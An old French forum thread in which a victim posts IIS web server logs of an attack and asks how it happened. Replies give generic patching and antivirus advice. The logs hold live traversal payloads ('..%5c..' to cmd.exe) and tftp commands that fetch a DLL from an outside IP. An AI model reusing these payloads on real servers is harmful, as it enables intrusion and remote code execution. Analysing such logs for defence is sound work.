je me suis fait pirater mais comment ?????

Question

voila ce que je trouve ds mes fichiers de logs de mon serveur web:

2002-07-08 13:51:06 X.X.X.X - 192.168.1.4 80 GET /scripts/root.exe /c+dir 404 -
2002-07-08 13:51:18 X.X.X.X - 192.168.1.4 80 GET /MSADC/root.exe /c+dir 403 -
2002-07-08 13:51:25 X.X.X.X - 192.168.1.4 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-08 13:51:31 X.X.X.X - 192.168.1.4 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-08 13:51:46 X.X.X.X - 192.168.1.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-07-08 13:52:44 X.X.X.X - 192.168.1.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20193.251.156.159%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2002-07-08 13:53:38 X.X.X.X - 192.168.1.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20193.251.156.159%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-07-08 13:53:45 X.X.X.X - 192.168.1.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20193.251.156.159%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-07-08 13:53:50 X.X.X.X - 192.168.1.4 80 GET /scripts/..%5c../httpodbc.dll - 500 -
2002-07-08 13:53:55 X.X.X.X - 192.168.1.4 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-07-08 13:54:00 X.X.X.X - 192.168.1.4 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20193.251.156.159%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2002-07-08 13:54:05 X.X.X.X - 192.168.1.4 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20193.251.156.159%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-07-08 13:54:12 X.X.X.X - 192.168.1.4 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20193.251.156.159%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-07-08 13:54:18 X.X.X.X - 192.168.1.4 80 GET /_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2002-07-08 13:54:25 X.X.X.X - 192.168.1.4 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-08 13:54:31 X.X.X.X - 192.168.1.4 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-07-08 13:54:37 X.X.X.X - 192.168.1.4 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -

Dans mon rep /inetpub/scripts j'ai trouvé des fichiers tftp et un serveur ftp serv-U

qq peut il me dire s'il comprend ce qu'il a fait

Mercci a tous

Afficher la suite

snx · Answer

Tu aurais du patcher ton serveur !
Et appliquer les mises à jour de WindowsUpdate == > http://windowsupdate.microsoft.com/
Et utiliser un antivirus mis à jour !
Et pourquoi pas installer un firewall !

Maintenant pour toi une seule adresse : http://www.secuser.com/antivirus/index.htm

snx · Answer

En relisant je me pose qq questions...192.168.1.4 80 c'est une adresse de reseau local ça !Et X.X.X.X ça correspond à quoi ?L'ip de l'attaquant ?L'ip de ta machine sur le net ?

nikko · Answer

192.168.1.4 80  est mon serveur Web et X.X.X.X l'ip de l'attaquant que j'ai vonlontairement cachémais je sais d'où ca vientAlors t'en pense quoi ??

nikko · Answer

192.168.1.4 80  est mon serveur Web et X.X.X.X l'ip de l'attaquant que j'ai vonlontairement cachémais je sais d'où ca vientAlors t'en pense quoi ??

nikko · Answer

192.168.1.4 80  est mon serveur Web et X.X.X.X l'ip de l'attaquant que j'ai vonlontairement cachémais je sais d'où ca vientAlors t'en pense quoi ??

nikto · Answer

yo nikko, bien ton troll ?

Je me suis fait pirater mais comment ?????

6 réponses

Votre réponse

Discussions similaires

Newsletters